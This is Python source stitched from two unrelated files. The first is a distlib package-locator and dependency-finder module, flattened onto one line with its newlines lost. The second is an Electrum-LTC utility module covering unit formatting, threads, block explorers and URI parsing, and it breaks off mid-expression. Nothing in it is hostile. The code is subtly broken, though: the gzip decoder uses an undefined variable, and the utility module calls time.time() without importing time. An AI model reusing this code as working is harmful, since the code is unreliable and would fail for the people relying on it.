decoders = { 'deflate': zlib.decompress, 'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(d)).read(), 'none': lambda b: b, } def __init__(self, url, timeout=None, num_workers=10, **kwargs): """ Initialise an instance. :param url: The root URL to use for scraping. :param timeout: The timeout, in seconds, to be applied to requests. This defaults to ``None`` (no timeout specified). :param num_workers: The number of worker threads you want to do I/O, This defaults to 10. :param kwargs: Passed to the superclass. """ super(SimpleScrapingLocator, self).__init__(**kwargs) self.base_url = ensure_slash(url) self.timeout = timeout self._page_cache = {} self._seen = set() self._to_fetch = queue.Queue() self._bad_hosts = set() self.skip_externals = False self.num_workers = num_workers self._lock = threading.RLock() def _prepare_threads(self): """ Threads are created only when get_project is called, and terminate before it returns. They are there primarily to parallelise I/O (i.e. fetching web pages). """ self._threads = [] for i in range(self.num_workers): t = threading.Thread(target=self._fetch) t.setDaemon(True) t.start() self._threads.append(t) def _wait_threads(self): """ Tell all the threads to terminate (by sending a sentinel value) and wait for them to do so. 
""" # Note that you need two loops, since you can't say which # thread will get each sentinel for t in self._threads: self._to_fetch.put(None) # sentinel for t in self._threads: t.join() self._threads = [] def _get_project(self, name): self.result = result = {} self.project_name = name url = urljoin(self.base_url, '%s/' % quote(name)) self._seen.clear() self._page_cache.clear() self._prepare_threads() try: logger.debug('Queueing %s', url) self._to_fetch.put(url) self._to_fetch.join() finally: self._wait_threads() del self.result return result platform_dependent = re.compile(r'\b(linux-(i\d86|x86_64|arm\w+)|' r'win(32|-amd64)|macosx-?\d+)\b', re.I) def _is_platform_dependent(self, url): """ Does an URL refer to a platform-specific download? """ return self.platform_dependent.search(url) def _process_download(self, url): """ See if an URL is a suitable download for a project. If it is, register information in the result dictionary (for _get_project) about the specific version it's for. Note that the return value isn't actually used other than as a boolean value. """ if self._is_platform_dependent(url): info = None else: info = self.convert_url_to_download_info(url, self.project_name) logger.debug('process_download: %s -> %s', url, info) if info: with self._lock: # needed because self.result is shared self._update_version_data(self.result, info) return info def _should_queue(self, link, referrer, rel): """ Determine whether a link URL from a referring page and with a particular "rel" attribute should be queued for scraping. 
""" scheme, netloc, path, _, _, _ = urlparse(link) if path.endswith(self.source_extensions + self.binary_extensions + self.excluded_extensions): result = False elif self.skip_externals and not link.startswith(self.base_url): result = False elif not referrer.startswith(self.base_url): result = False elif rel not in ('homepage', 'download'): result = False elif scheme not in ('http', 'https', 'ftp'): result = False elif self._is_platform_dependent(link): result = False else: host = netloc.split(':', 1)[0] if host.lower() == 'localhost': result = False else: result = True logger.debug('should_queue: %s (%s) from %s -> %s', link, rel, referrer, result) return result def _fetch(self): """ Get a URL to fetch from the work queue, get the HTML page, examine its links for download candidates and candidates for further scraping. This is a handy method to run in a thread. """ while True: url = self._to_fetch.get() try: if url: page = self.get_page(url) if page is None: # e.g. after an error continue for link, rel in page.links: if link not in self._seen: self._seen.add(link) if (not self._process_download(link) and self._should_queue(link, url, rel)): logger.debug('Queueing %s from %s', link, url) self._to_fetch.put(link) finally: # always do this, to avoid hangs :-) self._to_fetch.task_done() if not url: #logger.debug('Sentinel seen, quitting.') break def get_page(self, url): """ Get the HTML for an URL, possibly from an in-memory cache. XXX TODO Note: this cache is never actually cleared. It's assumed that the data won't get stale over the lifetime of a locator instance (not necessarily true for the default_locator). 
""" # http://peak.telecommunity.com/DevCenter/EasyInstall#package-index-api scheme, netloc, path, _, _, _ = urlparse(url) if scheme == 'file' and os.path.isdir(url2pathname(path)): url = urljoin(ensure_slash(url), 'index.html') if url in self._page_cache: result = self._page_cache[url] logger.debug('Returning %s from cache: %s', url, result) else: host = netloc.split(':', 1)[0] result = None if host in self._bad_hosts: logger.debug('Skipping %s due to bad host %s', url, host) else: req = Request(url, headers={'Accept-encoding': 'identity'}) try: logger.debug('Fetching %s', url) resp = self.opener.open(req, timeout=self.timeout) logger.debug('Fetched %s', url) headers = resp.info() content_type = headers.get('Content-Type', '') if HTML_CONTENT_TYPE.match(content_type): final_url = resp.geturl() data = resp.read() encoding = headers.get('Content-Encoding') if encoding: decoder = self.decoders[encoding] # fail if not found data = decoder(data) encoding = 'utf-8' m = CHARSET.search(content_type) if m: encoding = m.group(1) try: data = data.decode(encoding) except UnicodeError: data = data.decode('latin-1') # fallback result = Page(data, final_url) self._page_cache[final_url] = result except HTTPError as e: if e.code != 404: logger.exception('Fetch failed: %s: %s', url, e) except URLError as e: logger.exception('Fetch failed: %s: %s', url, e) with self._lock: self._bad_hosts.add(host) except Exception as e: logger.exception('Fetch failed: %s: %s', url, e) finally: self._page_cache[url] = result # even if None (failure) return result _distname_re = re.compile('<a href=[^>]*>([^<]+)<') def get_distribution_names(self): """ Return all the distribution names known to this locator. 
""" result = set() page = self.get_page(self.base_url) if not page: raise DistlibException('Unable to get %s' % self.base_url) for match in self._distname_re.finditer(page.data): result.add(match.group(1)) return result class DirectoryLocator(Locator): """ This class locates distributions in a directory tree. """ def __init__(self, path, **kwargs): """ Initialise an instance. :param path: The root of the directory tree to search. :param kwargs: Passed to the superclass constructor, except for: * recursive - if True (the default), subdirectories are recursed into. If False, only the top-level directory is searched, """ self.recursive = kwargs.pop('recursive', True) super(DirectoryLocator, self).__init__(**kwargs) path = os.path.abspath(path) if not os.path.isdir(path): raise DistlibException('Not a directory: %r' % path) self.base_dir = path def should_include(self, filename, parent): """ Should a filename be considered as a candidate for a distribution archive? As well as the filename, the directory which contains it is provided, though not used by the current implementation. """ return filename.endswith(self.downloadable_extensions) def _get_project(self, name): result = {} for root, dirs, files in os.walk(self.base_dir): for fn in files: if self.should_include(fn, root): fn = os.path.join(root, fn) url = urlunparse(('file', '', pathname2url(os.path.abspath(fn)), '', '', '')) info = self.convert_url_to_download_info(url, name) if info: self._update_version_data(result, info) if not self.recursive: break return result def get_distribution_names(self): """ Return all the distribution names known to this locator. 
""" result = set() for root, dirs, files in os.walk(self.base_dir): for fn in files: if self.should_include(fn, root): fn = os.path.join(root, fn) url = urlunparse(('file', '', pathname2url(os.path.abspath(fn)), '', '', '')) info = self.convert_url_to_download_info(url, None) if info: result.add(info['name']) if not self.recursive: break return result class JSONLocator(Locator): """ This locator uses special extended metadata (not available on PyPI) and is the basis of performant dependency resolution in distlib. Other locators require archive downloads before dependencies can be determined! As you might imagine, that can be slow. """ def get_distribution_names(self): """ Return all the distribution names known to this locator. """ raise NotImplementedError('Not available from this locator') def _get_project(self, name): result = {} data = get_project_data(name) if data: for info in data.get('files', []): if info['ptype'] != 'sdist' or info['pyversion'] != 'source': continue # We don't store summary in project metadata as it makes # the data bigger for no benefit during dependency # resolution dist = make_dist(data['name'], info['version'], summary=data.get('summary', 'Placeholder for summary'), scheme=self.scheme) md = dist.metadata md.source_url = info['url'] # TODO SHA256 digest if 'digest' in info and info['digest']: dist.digest = ('md5', info['digest']) md.dependencies = info.get('requirements', {}) dist.exports = info.get('exports', {}) result[dist.version] = dist return result class DistPathLocator(Locator): """ This locator finds installed distributions in a path. It can be useful for adding to an :class:`AggregatingLocator`. """ def __init__(self, distpath, **kwargs): """ Initialise an instance. :param distpath: A :class:`DistributionPath` instance to search. 
""" super(DistPathLocator, self).__init__(**kwargs) assert isinstance(distpath, DistributionPath) self.distpath = distpath def _get_project(self, name): dist = self.distpath.get_distribution(name) if dist is None: result = {} else: result = { dist.version: dist } return result class AggregatingLocator(Locator): """ This class allows you to chain and/or merge a list of locators. """ def __init__(self, *locators, **kwargs): """ Initialise an instance. :param locators: The list of locators to search. :param kwargs: Passed to the superclass constructor, except for: * merge - if False (the default), the first successful search from any of the locators is returned. If True, the results from all locators are merged (this can be slow). """ self.merge = kwargs.pop('merge', False) self.locators = locators super(AggregatingLocator, self).__init__(**kwargs) def clear_cache(self): super(AggregatingLocator, self).clear_cache() for locator in self.locators: locator.clear_cache() def _set_scheme(self, value): self._scheme = value for locator in self.locators: locator.scheme = value scheme = property(Locator.scheme.fget, _set_scheme) def _get_project(self, name): result = {} for locator in self.locators: d = locator.get_project(name) if d: if self.merge: result.update(d) else: # See issue #18. If any dists are found and we're looking # for specific constraints, we only return something if # a match is found. For example, if a DirectoryLocator # returns just foo (1.0) while we're looking for # foo (>= 2.0), we'll pretend there was nothing there so # that subsequent locators can be queried. Otherwise we # would just return foo (1.0) which would then lead to a # failure to find foo (>= 2.0), because other locators # weren't searched. Note that this only matters when # merge=False. 
if self.matcher is None: found = True else: found = False for k in d: if self.matcher.match(k): found = True break if found: result = d break return result def get_distribution_names(self): """ Return all the distribution names known to this locator. """ result = set() for locator in self.locators: try: result |= locator.get_distribution_names() except NotImplementedError: pass return result # We use a legacy scheme simply because most of the dists on PyPI use legacy # versions which don't conform to PEP 426 / PEP 440. default_locator = AggregatingLocator( JSONLocator(), SimpleScrapingLocator('https://pypi.python.org/simple/', timeout=3.0), scheme='legacy') locate = default_locator.locate NAME_VERSION_RE = re.compile(r'(?P<name>[\w-]+)\s*' r'\(\s*(==\s*)?(?P<ver>[^)]+)\)$') class DependencyFinder(object): """ Locate dependencies for distributions. """ def __init__(self, locator=None): """ Initialise an instance, using the specified locator to locate distributions. """ self.locator = locator or default_locator self.scheme = get_scheme(self.locator.scheme) def add_distribution(self, dist): """ Add a distribution to the finder. This will update internal information about who provides what. :param dist: The distribution to add. """ logger.debug('adding distribution %s', dist) name = dist.key self.dists_by_name[name] = dist self.dists[(name, dist.version)] = dist for p in dist.provides: name, version = parse_name_and_version(p) logger.debug('Add to provided: %s, %s, %s', name, version, dist) self.provided.setdefault(name, set()).add((version, dist)) def remove_distribution(self, dist): """ Remove a distribution from the finder. This will update internal information about who provides what. :param dist: The distribution to remove. 
""" logger.debug('removing distribution %s', dist) name = dist.key del self.dists_by_name[name] del self.dists[(name, dist.version)] for p in dist.provides: name, version = parse_name_and_version(p) logger.debug('Remove from provided: %s, %s, %s', name, version, dist) s = self.provided[name] s.remove((version, dist)) if not s: del self.provided[name] def get_matcher(self, reqt): """ Get a version matcher for a requirement. :param reqt: The requirement :type reqt: str :return: A version matcher (an instance of :class:`distlib.version.Matcher`). """ try: matcher = self.scheme.matcher(reqt) except UnsupportedVersionError: # XXX compat-mode if cannot read the version name = reqt.split()[0] matcher = self.scheme.matcher(name) return matcher def find_providers(self, reqt): """ Find the distributions which can fulfill a requirement. :param reqt: The requirement. :type reqt: str :return: A set of distribution which can fulfill the requirement. """ matcher = self.get_matcher(reqt) name = matcher.key # case-insensitive result = set() provided = self.provided if name in provided: for version, provider in provided[name]: try: match = matcher.match(version) except UnsupportedVersionError: match = False if match: result.add(provider) break return result def try_to_replace(self, provider, other, problems): """ Attempt to replace one provider with another. This is typically used when resolving dependencies from multiple sources, e.g. A requires (B >= 1.0) while C requires (B >= 1.1). For successful replacement, ``provider`` must meet all the requirements which ``other`` fulfills. :param provider: The provider we are trying to replace with. :param other: The provider we're trying to replace. :param problems: If False is returned, this will contain what problems prevented replacement. This is currently a tuple of the literal string 'cantreplace', ``provider``, ``other`` and the set of requirements that ``provider`` couldn't fulfill. 
:return: True if we can replace ``other`` with ``provider``, else False. """ rlist = self.reqts[other] unmatched = set() for s in rlist: matcher = self.get_matcher(s) if not matcher.match(provider.version): unmatched.add(s) if unmatched: # can't replace other with provider problems.add(('cantreplace', provider, other, unmatched)) result = False else: # can replace other with provider self.remove_distribution(other) del self.reqts[other] for s in rlist: self.reqts.setdefault(provider, set()).add(s) self.add_distribution(provider) result = True return result def find(self, requirement, meta_extras=None, prereleases=False): """ Find a distribution and all distributions it depends on. :param requirement: The requirement specifying the distribution to find, or a Distribution instance. :param meta_extras: A list of meta extras such as :test:, :build: and so on. :param prereleases: If ``True``, allow pre-release versions to be returned - otherwise, don't return prereleases unless they're all that's available. Return a set of :class:`Distribution` instances and a set of problems. The distributions returned should be such that they have the :attr:`required` attribute set to ``True`` if they were from the ``requirement`` passed to ``find()``, and they have the :attr:`build_time_dependency` attribute set to ``True`` unless they are post-installation dependencies of the ``requirement``. The problems should be a tuple consisting of the string ``'unsatisfied'`` and the requirement which couldn't be satisfied by any distribution known to the locator. 
""" self.provided = {} self.dists = {} self.dists_by_name = {} self.reqts = {} meta_extras = set(meta_extras or []) if ':*:' in meta_extras: meta_extras.remove(':*:') # :meta: and :run: are implicitly included meta_extras |= set([':test:', ':build:', ':dev:']) if isinstance(requirement, Distribution): dist = odist = requirement logger.debug('passed %s as requirement', odist) else: dist = odist = self.locator.locate(requirement, prereleases=prereleases) if dist is None: raise DistlibException('Unable to locate %r' % requirement) logger.debug('located %s', odist) dist.requested = True problems = set() todo = set([dist]) install_dists = set([odist]) while todo: dist = todo.pop() name = dist.key # case-insensitive if name not in self.dists_by_name: self.add_distribution(dist) else: #import pdb; pdb.set_trace() other = self.dists_by_name[name] if other != dist: self.try_to_replace(dist, other, problems) ireqts = dist.run_requires | dist.meta_requires sreqts = dist.build_requires ereqts = set() if dist in install_dists: for key in ('test', 'build', 'dev'): e = ':%s:' % key if e in meta_extras: ereqts |= getattr(dist, '%s_requires' % key) all_reqts = ireqts | sreqts | ereqts for r in all_reqts: providers = self.find_providers(r) if not providers: logger.debug('No providers found for %r', r) provider = self.locator.locate(r, prereleases=prereleases) # If no provider is found and we didn't consider # prereleases, consider them now. 
if provider is None and not prereleases: provider = self.locator.locate(r, prereleases=True) if provider is None: logger.debug('Cannot satisfy %r', r) problems.add(('unsatisfied', r)) else: n, v = provider.key, provider.version if (n, v) not in self.dists: todo.add(provider) providers.add(provider) if r in ireqts and dist in install_dists: install_dists.add(provider) logger.debug('Adding %s to install_dists', provider.name_and_version) for p in providers: name = p.key if name not in self.dists_by_name: self.reqts.setdefault(p, set()).add(r) else: other = self.dists_by_name[name] if other != p: # see if other can be replaced by p self.try_to_replace(p, other, problems) dists = set(self.dists.values()) for dist in dists: dist.build_time_dependency = dist not in install_dists if dist.build_time_dependency: logger.debug('%s is a build-time dependency only.', dist.name_and_version) logger.debug('find done for %s', odist) return dists, problems
# ======================================================================
# util.py — Electrum-LTC utility module (concatenated below)
# ======================================================================
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac

from .i18n import _

import urllib.request, urllib.parse, urllib.error
import queue


def inv_dict(d):
    """Invert a one-to-one mapping: {k: v} -> {v: k}."""
    return {v: k for k, v in d.items()}


# Decimal places per display unit; 'sat' means raw satoshis.
base_units = {'LTC':8, 'mLTC':5, 'uLTC':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['LTC', 'mLTC', 'uLTC', 'sat']  # list(dict) does not guarantee order


def decimal_point_to_base_unit_name(dp: int) -> str:
    # e.g. 8 -> "LTC"  (comment fixed: this fork's units are LTC, not BTC)
    try:
        return base_units_inverse[dp]
    except KeyError:
        raise Exception('Unknown base unit')


def base_unit_name_to_decimal_point(unit_name: str) -> int:
    # e.g. "LTC" -> 8
    try:
        return base_units[unit_name]
    except KeyError:
        raise Exception('Unknown base unit')


def normalize_version(v):
    """Parse a dotted version string into a list of ints, ignoring
    trailing ".0" components: "3.2.0" -> [3, 2]."""
    return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]


class NotEnoughFunds(Exception): pass


class NoDynamicFeeEstimates(Exception):
    def __str__(self):
        return _('Dynamic fee estimates not available')


class InvalidPassword(Exception):
    def __str__(self):
        return _("Incorrect password")


class FileImportFailed(Exception):
    def __init__(self, message=''):
        self.message = str(message)

    def __str__(self):
        return _("Failed to import from file.") + "\n" + self.message


class FileExportFailed(Exception):
    def __init__(self, message=''):
        self.message = str(message)

    def __str__(self):
        return _("Failed to export to file.") + "\n" + self.message


class TimeoutException(Exception):
    def __init__(self, message=''):
        self.message = str(message)

    def __str__(self):
        if not self.message:
            return _("Operation timed out.")
        return self.message


class WalletFileException(Exception): pass


class BitcoinException(Exception): pass


# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
    '''An exception that is suppressed from the user'''
    pass


class Satoshis(object):
    """Wrapper for a satoshi amount, used for display/JSON encoding."""

    def __new__(cls, value):
        self = super(Satoshis, cls).__new__(cls)
        self.value = value
        return self

    def __repr__(self):
        return 'Satoshis(%d)' % self.value

    def __str__(self):
        return format_satoshis(self.value) + " LTC"


class Fiat(object):
    """A fiat amount (a Decimal) tagged with its currency code."""

    def __new__(cls, value, ccy):
        self = super(Fiat, cls).__new__(cls)
        self.ccy = ccy
        self.value = value
        return self

    def __repr__(self):
        return 'Fiat(%s)' % self.__str__()

    def __str__(self):
        if self.value.is_nan():
            return _('No Data')
        return "{:.2f}".format(self.value) + ' ' + self.ccy


class MyEncoder(json.JSONEncoder):
    """JSON encoder aware of Electrum's value types."""

    def default(self, obj):
        # Imported lazily to avoid a circular import at module load time.
        from .transaction import Transaction
        if isinstance(obj, Transaction):
            return obj.as_dict()
        # Satoshis, Fiat and Decimal all serialise via their str() form.
        if isinstance(obj, (Satoshis, Fiat, Decimal)):
            return str(obj)
        if isinstance(obj, datetime):
            return obj.isoformat(' ')[:-3]
        return super(MyEncoder, self).default(obj)


class PrintError(object):
    '''A handy base class'''

    def diagnostic_name(self):
        return self.__class__.__name__

    def print_error(self, *msg):
        # only prints with --verbose flag
        print_error("[%s]" % self.diagnostic_name(), *msg)

    def print_stderr(self, *msg):
        print_stderr("[%s]" % self.diagnostic_name(), *msg)

    def print_msg(self, *msg):
        print_msg("[%s]" % self.diagnostic_name(), *msg)


class ThreadJob(PrintError):
    """A job that is run periodically from a thread's main loop. run() is
    called from that thread's context.
    """

    def run(self):
        """Called periodically from the thread"""
        pass


class DebugMem(ThreadJob):
    '''A handy class for debugging GC memory leaks'''

    def __init__(self, classes, interval=30):
        self.next_time = 0
        self.classes = classes
        self.interval = interval

    def mem_stats(self):
        import gc
        self.print_error("Start memscan")
        gc.collect()
        objmap = defaultdict(list)
        for obj in gc.get_objects():
            for class_ in self.classes:
                if isinstance(obj, class_):
                    objmap[class_].append(obj)
        for class_, objs in objmap.items():
            self.print_error("%s: %d" % (class_.__name__, len(objs)))
        self.print_error("Finish memscan")

    def run(self):
        # Rate-limited: scan at most once per `interval` seconds.
        if time.time() > self.next_time:
            self.mem_stats()
            self.next_time = time.time() + self.interval


class DaemonThread(threading.Thread, PrintError):
    """ daemon thread that terminates cleanly """

    def __init__(self):
        threading.Thread.__init__(self)
        self.parent_thread = threading.currentThread()
        self.running = False
        self.running_lock = threading.Lock()
        self.job_lock = threading.Lock()
        self.jobs = []

    def add_jobs(self, jobs):
        with self.job_lock:
            self.jobs.extend(jobs)

    def run_jobs(self):
        """Run every registered job once.

        Don't let a throwing job disrupt the thread, future runs of
        itself, or other jobs.
        """
This is useful protection against # malformed or malicious server responses with self.job_lock: for job in self.jobs: try: job.run() except Exception as e: traceback.print_exc(file=sys.stderr) def remove_jobs(self, jobs): with self.job_lock: for job in jobs: self.jobs.remove(job) def start(self): with self.running_lock: self.running = True return threading.Thread.start(self) def is_running(self): with self.running_lock: return self.running and self.parent_thread.is_alive() def stop(self): with self.running_lock: self.running = False def on_stop(self): if 'ANDROID_DATA' in os.environ: import jnius jnius.detach() self.print_error("jnius detach") self.print_error("stopped") # TODO: disable is_verbose = True def set_verbosity(b): global is_verbose is_verbose = b def print_error(*args): if not is_verbose: return print_stderr(*args) def print_stderr(*args): args = [str(item) for item in args] sys.stderr.write(" ".join(args) + "\n") sys.stderr.flush() def print_msg(*args): # Stringify args args = [str(item) for item in args] sys.stdout.write(" ".join(args) + "\n") sys.stdout.flush() def json_encode(obj): try: s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder) except TypeError: s = repr(obj) return s def json_decode(x): try: return json.loads(x, parse_float=Decimal) except: return x # taken from Django Source Code def constant_time_compare(val1, val2): """Return True if the two strings are equal, False otherwise.""" return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8')) # decorator that prints execution time def profiler(func): def do_profile(func, args, kw_args): n = func.__name__ t0 = time.time() o = func(*args, **kw_args) t = time.time() - t0 print_error("[profiler]", n, "%.4f"%t) return o return lambda *args, **kw_args: do_profile(func, args, kw_args) def android_ext_dir(): import jnius env = jnius.autoclass('android.os.Environment') return env.getExternalStorageDirectory().getPath() def android_data_dir(): import jnius PythonActivity 
= jnius.autoclass('org.kivy.android.PythonActivity') return PythonActivity.mActivity.getFilesDir().getPath() + '/data' def android_headers_dir(): d = android_ext_dir() + '/org.electrum_ltc.electrum_ltc' if not os.path.exists(d): os.mkdir(d) return d def android_check_data_dir(): """ if needed, move old directory to sandbox """ ext_dir = android_ext_dir() data_dir = android_data_dir() old_electrum_dir = ext_dir + '/electrum-ltc' if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir): import shutil new_headers_path = android_headers_dir() + '/blockchain_headers' old_headers_path = old_electrum_dir + '/blockchain_headers' if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path): print_error("Moving headers file to", new_headers_path) shutil.move(old_headers_path, new_headers_path) print_error("Moving data to", data_dir) shutil.move(old_electrum_dir, data_dir) return data_dir def get_headers_dir(config): return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path def assert_datadir_available(config_path): path = config_path if os.path.exists(path): return else: raise FileNotFoundError( 'Electrum datadir does not exist. Was it deleted while running?' + '\n' + 'Should be at {}'.format(path)) def assert_file_in_datadir_available(path, config_path): if os.path.exists(path): return else: assert_datadir_available(config_path) raise FileNotFoundError( 'Cannot find file but datadir is there.' 
+ '\n' + 'Should be at {}'.format(path)) def assert_bytes(*args): """ porting helper, assert args type """ try: for x in args: assert isinstance(x, (bytes, bytearray)) except: print('assert bytes failed', list(map(type, args))) raise def assert_str(*args): """ porting helper, assert args type """ for x in args: assert isinstance(x, str) def to_string(x, enc): if isinstance(x, (bytes, bytearray)): return x.decode(enc) if isinstance(x, str): return x else: raise TypeError("Not a string or bytes like object") def to_bytes(something, encoding='utf8'): """ cast string to bytes() like object, but for python2 support it's bytearray copy """ if isinstance(something, bytes): return something if isinstance(something, str): return something.encode(encoding) elif isinstance(something, bytearray): return bytes(something) else: raise TypeError("Not a string or bytes like object") bfh = bytes.fromhex hfu = binascii.hexlify def bh2u(x): """ str with hex representation of a bytes-like object >>> x = bytes((1, 2, 10)) >>> bh2u(x) '01020A' :param x: bytes :rtype: str """ return hfu(x).decode('ascii') def user_dir(): if 'ANDROID_DATA' in os.environ: return android_check_data_dir() elif os.name == 'posix': return os.path.join(os.environ["HOME"], ".electrum-ltc") elif "APPDATA" in os.environ: return os.path.join(os.environ["APPDATA"], "Electrum-LTC") elif "LOCALAPPDATA" in os.environ: return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-LTC") else: #raise Exception("No home directory found in environment variables.") return def format_satoshis_plain(x, decimal_point = 8): """Display a satoshi amount scaled. Always uses a '.' 
    as a decimal point and has no thousands separator"""
    scale_factor = pow(10, decimal_point)
    return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')


def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None,
                    is_diff=False, whitespaces=False):
    """Format a satoshi amount for display.

    :param x: amount in satoshis; ``None`` yields ``'unknown'``
    :param num_zeros: minimum number of fractional digits to keep
    :param decimal_point: log10 of the scale factor (8 -> whole coins)
    :param precision: fractional digits to render; defaults to decimal_point
    :param is_diff: if True, positive amounts get a leading '+'
    :param whitespaces: if True, pad to fixed-width columns for tabular UI
    """
    from locale import localeconv
    if x is None:
        return 'unknown'
    if precision is None:
        precision = decimal_point
    # NOTE(review): if precision == 0 the format has no fractional part and
    # the split(".") below would raise; callers here always pass precision
    # >= 1 (see format_fee_satoshis) — confirm before changing.
    decimal_format = ".0" + str(precision) if precision > 0 else ""
    if is_diff:
        decimal_format = '+' + decimal_format
    result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
    integer_part, fract_part = result.split(".")
    # Use the locale's decimal separator for display.
    dp = localeconv()['decimal_point']
    if len(fract_part) < num_zeros:
        fract_part += "0" * (num_zeros - len(fract_part))
    result = integer_part + dp + fract_part
    if whitespaces:
        result += " " * (decimal_point - len(fract_part))
        result = " " * (15 - len(result)) + result
    return result


FEERATE_PRECISION = 1  # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)


def format_fee_satoshis(fee, num_zeros=0):
    return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)


def quantize_feerate(fee):
    """Strip sat/byte fee rate of excess precision."""
    if fee is None:
        return None
    return Decimal(fee).quantize(_feerate_quanta,
                                 rounding=decimal.ROUND_HALF_DOWN)


def timestamp_to_datetime(timestamp):
    # Returns a naive local-time datetime, or None for a missing timestamp.
    if timestamp is None:
        return None
    return datetime.fromtimestamp(timestamp)


def format_time(timestamp):
    date = timestamp_to_datetime(timestamp)
    return date.isoformat(' ')[:-3] if date else _("Unknown")


# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
    if from_date is None:
        return "Unknown"
    from_date = datetime.fromtimestamp(from_date)
    if since_date is None:
        since_date = datetime.now(target_tz)
    td = time_difference(from_date - since_date, include_seconds)
    return td + " ago" if from_date < since_date else "in " + td


def time_difference(distance_in_time, include_seconds):
    #distance_in_time = since_date - from_date
    distance_in_seconds = int(round(abs(distance_in_time.days * 86400 +
                                        distance_in_time.seconds)))
    distance_in_minutes = int(round(distance_in_seconds/60))
    if distance_in_minutes <= 1:
        if include_seconds:
            for remainder in [5, 10, 20]:
                if distance_in_seconds < remainder:
                    return "less than %s seconds" % remainder
            if distance_in_seconds < 40:
                return "half a minute"
            elif distance_in_seconds < 60:
                return "less than a minute"
            else:
                return "1 minute"
        else:
            if distance_in_minutes == 0:
                return "less than a minute"
            else:
                return "1 minute"
    elif distance_in_minutes < 45:
        return "%s minutes" % distance_in_minutes
    elif distance_in_minutes < 90:
        return "about 1 hour"
    elif distance_in_minutes < 1440:
        return "about %d hours" % (round(distance_in_minutes / 60.0))
    elif distance_in_minutes < 2880:
        return "1 day"
    elif distance_in_minutes < 43220:
        # NOTE(review): 43220 looks like a typo for 43200 (30 days) — the
        # '%d months' branch below divides by 43200. Confirm before changing.
        return "%d days" % (round(distance_in_minutes / 1440))
    elif distance_in_minutes < 86400:
        return "about 1 month"
    elif distance_in_minutes < 525600:
        return "%d months" % (round(distance_in_minutes / 43200))
    elif distance_in_minutes < 1051200:
        return "about 1 year"
    else:
        return "over %d years" % (round(distance_in_minutes / 525600))


# Block explorer registry: name -> (base URL, {kind: path prefix}).
mainnet_block_explorers = {
    'Bchain.info': ('https://bchain.info/',
                    {'tx': 'LTC/tx/', 'addr': 'LTC/addr/'}),
    'BlockCypher.com': ('https://live.blockcypher.com/ltc/',
                        {'tx': 'tx/', 'addr': 'address/'}),
    'explorer.litecoin.net': ('http://explorer.litecoin.net/',
                              {'tx': 'tx/', 'addr': 'address/'}),
    'LiteCore': ('https://insight.litecore.io/',
                 {'tx': 'tx/', 'addr': 'address/'}),
    'SoChain': ('https://chain.so/',
                {'tx': 'tx/LTC/', 'addr': 'address/LTC/'}),
    'system default': ('blockchain://12a765e31ffd4059bada1e25190f6e98c99d9714d334efa41a195a7e7e04bfe2/',
                       {'tx': 'tx/', 'addr': 'address/'}),
}

testnet_block_explorers = {
    'LiteCore': ('https://testnet.litecore.io/',
                 {'tx': 'tx/', 'addr': 'address/'}),
    'SoChain': ('https://chain.so/',
{'tx': 'tx/LTCTEST/', 'addr': 'address/LTCTEST/'}), 'system default': ('blockchain://4966625a4b2851d9fdee139e56211a0d88575f59ed816ff5e6a63deb4e3e29a0/', {'tx': 'tx/', 'addr': 'address/'}), } def block_explorer_info(): from . import constants return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers def block_explorer(config): return config.get('block_explorer', 'LiteCore') def block_explorer_tuple(config): return block_explorer_info().get(block_explorer(config)) def block_explorer_URL(config, kind, item): be_tuple = block_explorer_tuple(config) if not be_tuple: return kind_str = be_tuple[1].get(kind) if not kind_str: return url_parts = [be_tuple[0], kind_str, item] return ''.join(url_parts) # URL decode #_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE) #urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x) def parse_URI(uri, on_pr=None): from . import bitcoin from .bitcoin import COIN if ':' not in uri: if not bitcoin.is_address(uri): raise Exception("Not a Litecoin address") return {'address': uri} u = urllib.parse.urlparse(uri) if u.scheme != 'litecoin': raise Exception("Not a litecoin URI") address = u.path # python for android fails to parse query if address.find('?') > 0: address, query = u.path.split('?') pq = urllib.parse.parse_qs(query) else: pq = urllib.parse.parse_qs(u.query) for k, v in pq.items(): if len(v)!=1: raise Exception('Duplicate Key', k) out = {k: 